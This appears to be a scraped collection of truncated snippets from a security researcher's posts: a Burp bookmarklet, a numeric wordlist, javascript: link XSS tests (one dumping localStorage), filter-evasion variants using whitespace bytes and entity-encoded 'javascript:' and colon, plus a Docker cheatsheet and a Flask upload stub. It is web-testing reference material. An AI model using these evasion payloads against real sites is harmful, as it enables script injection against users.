mrrootsec

javascript:(function(){const c='burp_converter_'+Date.now(),d=document.createElement('div');d.id=c;d.innerHTML='<div style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);width:90%;max-width:800px;max-height:90vh;background:#f5f5f5;border:2px solid #333;border-radius:8px;box-shadow:0 4px 20px rgba(0,0,0,0.3);z-index:999999;font-family:\'Courier New\',monospace;overflow:hidden;display:flex;flex-direction:column"><div style="background:#222;color:#fff;padding:12px 16px;font-weight:bold;font-size:14px;display:flex;justify-content:space-between;align-items:center"><span>Fetch to Burp Converter</span><button id="'+c+'_close" style="background:#ff4444;color:white;border:none;padding:4px 8px;border-radius:3px;cursor:pointer;font-weight:bold">×</button></div><div style="flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:16px"><div><label style="display:block;margin-bottom:6px;font-weight:bold;font-size:12px">Input (fetch call, object, or raw HTTP):</label><textarea id="'+c+'_in

mrrootsec

0
00
01
02
03
1
1.0
10
100
1000

mrrootsec

Links:

[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')

Images:

mrrootsec

name: JSON param key as column name
function: VIEW_FILTER
location: PROXY_HTTP_HISTORY
source: |+
  /**
   * Extracts a JSON parameter and creates a column named after the parameter.
   * @author mrrootsec
   */

  var req = requestResponse.request();

mrrootsec

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

• Generic Passwords / Secrets / Tokens:

  • Regex:

mrrootsec

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

mrrootsec

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

mrrootsec

# Docker Cheatsheet

## Tutorial series

Get started with Docker: [https://docs.docker.com/engine/getstarted/](https://docs.docker.com/engine/getstarted/)

## Installation

### Linux

mrrootsec

(function(){
  // http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/
	// http://subsimple.com/bookmarklets/jsbuilder.htm

	if(window.jQuery === undefined) {
		var script = document.createElement("script");
		script.src = "https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js";
		script.onload = script.onreadystatechange = function() {
			bookmarklet();
		};

mrrootsec

from flask import Flask, request, jsonify
import os

app = Flask(__name__)

# Directory where uploaded files will be stored
UPLOAD_FOLDER = './uploads'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER